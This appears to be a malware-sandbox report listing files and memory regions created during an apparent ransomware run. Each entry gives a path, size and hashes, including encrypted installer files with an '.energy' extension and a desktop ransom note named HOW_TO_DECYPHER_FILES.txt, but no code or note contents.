SHA512
01198768dc39e8d2978548d823122588b063fc908c805dda02a17ce1049ba3c743b9e3b9e467fa157140e9cdff0284f56be1b12fbca29a4f67747be28061dc73

Download Submit
C:\ProgramData\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\dotnet-runtime-6.0.27-win-x64.msi

Filesize
25.7MB

MD5
e630748cfc5179deb765d5c20570f5d2

SHA1
f77ec7a5d346bd3f287cbc17143ba0d8a393ba25

SHA256
6e50dbe7819217e76a098cd14753a8eb9d5230bd647e33e2a4a7815e17f671f2

SHA512
2fddac097691bc64e2162f81dda718438b1e9164dd8e1a40ed1001f14ed1b40c3b556f95a65ce18203e159d70f2979e1e614cf681d43166b69332a540a4043ea

Download Submit
C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.energy[[email protected]]

Filesize
180KB

MD5
fa59f56b3b238c1cf6c5de0536a6495d

SHA1
09993eb35273962b3bdcc935248f4b0b3baf37d1

SHA256
296c0c765fd313027a327ff780460efa1de15d8c2c52297317472ce4630f4ed5

SHA512
79aa84a4670123735f7de16fa7969e1290ddf946caec6c1bba2c0d0c8ad79397962ca6af4256b4b1dbdcf4a8caabb6d734ae96ed4097c3c2b673f7462467037f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
aa4f31835d07347297d35862c9045f4a

SHA1
83e728008935d30f98e5480fba4fbccf10cefb05

SHA256
99c83bc5c531e49d4240700142f3425aba74e18ebcc23556be32238ffde9cce0

SHA512
ec3a4bee8335007b8753ae8ac42287f2b3bcbb258f7fc3fb15c9f8d3e611cb9bf6ae2d3034953286a34f753e9ec33f7495e064bab0e8c7fcedd75d6e5eb66629

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\ZW84ELH2\www.bing[1].xml

Filesize
7KB

MD5
e4b64e59319009bf137a17947c966725

SHA1
f5abeacc3ac8ad31d6d3087515363b929062472a

SHA256
466e71b2e21828bfe7a5a9a5f9c98e92d03adbb8111ab3a47c687651eef02cd5

SHA512
aea82e1600314d80d5a88e668d1fea4b94e63f22998db69fd30625539daf911272c4a3a6c0e56a788113832bc07dc4efbd8d2d8ccfe36f9723280a632cd2324b

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\ZW84ELH2\www.bing[1].xml

Filesize
327B

MD5
381933aa70049b14f2e685127568d7d3

SHA1
f8897abc400f5fe9c2791e4f01f0ad8dbfd8ee35

SHA256
5c1bc71dd5fb86608b75a418cf072410e55f12e64b996f6ea5def4bbeb31ab2e

SHA512
b4508058e967e6f30576d1b95608384f25cfa74fae78ab0ff3cde6b9e1784a17ec75b6f891c412759d98e4a0ca641ec82aa534c13cc85c9802d5fa0f31880d26

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\ZW84ELH2\www.bing[1].xml

Filesize
327B

MD5
02220e019ffd33b508959b66ee336f24

SHA1
f2eff463bc3da405339bfd733fa172d2ae1a630f

SHA256
e767144d5f38fc0a4a64084e5f83105c2776fd8b5279ab028ad571923418c68e

SHA512
8d38a75bcf96ea4a452b861f452b99c450fc5eba58671a3571c636984f2efcadea58f2c526628bec4195ca0d6aa720e39806e3335652a108f78973ac2ef0d9f5

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\ServiceWorkerFiles\E0A6F526-750A-4277-81E1-E6099229297A\Zrtu2hQ08VU_1.bytecode

Filesize
66KB

MD5
f769fa86be8e7d2f87bb71e510cab5a4

SHA1
e1c69a2441718268af8f3c10b622dc2790b630bd

SHA256
b6f0be71b3ff3446c84890ebcee4d64b6c6f71756c6de286abc77243c7bff164

SHA512
bdf600da8a2f176942aa7e9423f593172216eecb6916372db6bcb8b8ac28403c0605f9569f5fe9103aa7f41e3203feeda514e998289d24777fdc506d304e3d7d

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\ServiceWorkerFiles\E0A6F526-750A-4277-81E1-E6099229297A\Zrtu2hQ08VU_1.metadata

Filesize
192B

MD5
1b8a2de9100bb712fadbd8bacac7c6a6

SHA1
aad8a5f75c2c631b6c4fd39bb891b85d247fc177

SHA256
68d5af803f7fd454756f550e33d2cc87e0b89338323589c367fb5eee3731d013

SHA512
ba3eeee66e8bd57382794146ca44934102728421faaf7c16f7a29b7e6e52f2a4e2cadd02301ee427a389ee598b6c7eff6f9378f515a0e9bde38eea2654a05a90

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoftwindows.client.cbs_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\ZW84ELH2\www.bing[1].xml

Filesize
36KB

MD5
36c9d00318ffb621b669ac492a08990a

SHA1
08f956939222a9d9ad6753be2f6a2b4862238986

SHA256
651e901da520010b279147d545a2afa78bb3dd3401861b96fac9162f34eafc69

SHA512
fd2dae47bf2411d522cca9c5aac9363aaee67aa063e53996728c5e0babe1a19d54efd0fee72d482e32a9b5ecd3f763ae78d940d580736cec0c7401fb514841eb

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoftwindows.client.cbs_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\ZW84ELH2\www.bing[1].xml

Filesize
35KB

MD5
57b64d33d9c49ac6ed768f277d8c6501

SHA1
85369b716cc0c98b1718b27a9a06168359af013e

SHA256
15b332b9b6fe088364689343cc19679f81c6b389e9c20c485dabc31f8aaa3443

SHA512
b9601e18ce5be8bd5975fa38577046539e8142e03c66e6e94966b4d5cb6828303bdfbd3983dcc83748d2040b5e22a439bed21d5989368a7061d027e6ea30819d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_glfpjxxa.3mk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Filesize
828B

MD5
297664460afd45647a936dc7c34272e5

SHA1
7201f0d39576897729c7232d384dfc09905d1fc4

SHA256
8e4a232c5546fe02003aeb57b0d565b4b65ae2ebc63f526d7147012523801c56

SHA512
85468fde953673e8c8bd966dbe3f834a423c310f3b3b65427415b6f5ade8426af1c92098bcf7a0d206bedfce7767ed35082851aeaa0f6d9b86fcae2538ebdf1c

Download Submit
memory/1288-918-0x00000222B71B0000-0x00000222B72B0000-memory.dmp

Filesize
1024KB

Download
memory/1288-719-0x000002228E1D0000-0x000002228E2D0000-memory.dmp

Filesize
1024KB

Download
memory/1288-880-0x00000222B4F00000-0x00000222B5000000-memory.dmp

Filesize
1024KB

Download
memory/1288-786-0x00000222B1160000-0x00000222B1180000-memory.dmp

Filesize
128KB

Download
memory/1288-785-0x00000222B1520000-0x00000222B1620000-memory.dmp

Filesize
1024KB

Download
memory/1288-784-0x00000222B0BA0000-0x00000222B0BC0000-memory.dmp

Filesize
128KB

Download
memory/5044-12-0x0000028435C30000-0x0000028435C52000-memory.dmp

Filesize
136KB

Download
memory/5852-1024-0x00007FFC844F0000-0x00007FFC84FB2000-memory.dmp

Filesize
10.8MB

Download
memory/5852-415-0x00007FFC844F3000-0x00007FFC844F5000-memory.dmp

Filesize
8KB

Download
memory/5852-1-0x0000000000280000-0x000000000029A000-memory.dmp

Filesize
104KB

Download
memory/5852-2-0x00007FFC844F0000-0x00007FFC84FB2000-memory.dmp

Filesize
10.8MB

Download
memory/5852-583-0x00007FFC844F0000-0x00007FFC84FB2000-memory.dmp

Filesize
10.8MB

Download
memory/5852-0-0x00007FFC844F3000-0x00007FFC844F5000-memory.dmp

Filesize
8KB

Download
memory/5920-506-0x0000022FD6FB0000-0x0000022FD70B0000-memory.dmp

Filesize
1024KB

Download
memory/5920-215-0x000002279E900000-0x000002279EA00000-memory.dmp

Filesize
1024KB

Download
memory/5920-510-0x0000022FD6FB0000-0x0000022FD70B0000-memory.dmp

Filesize
1024KB

Download
memory/5920-393-0x0000022FD31C0000-0x0000022FD32C0000-memory.dmp

Filesize
1024KB

Download
memory/5920-396-0x0000022FD3010000-0x0000022FD3030000-memory.dmp

Filesize
128KB

Download
memory/5920-392-0x0000022FD2380000-0x0000022FD23A0000-memory.dmp

Filesize
128KB

Download
memory/6732-1035-0x000001E967C00000-0x000001E967D00000-memory.dmp

Filesize
1024KB

Download
memory/6732-1094-0x000001E97A760000-0x000001E97A780000-memory.dmp

Filesize
128KB

Download
memory/6732-1095-0x000001E97AB70000-0x000001E97AC70000-memory.dmp

Filesize
1024KB

Download
memory/6732-1101-0x000001E97AAF0000-0x000001E97AB10000-memory.dmp

Filesize
128KB

Download
memory/6732-1190-0x000001E97E9E0000-0x000001E97EAE0000-memory.dmp

Filesize
1024KB

Download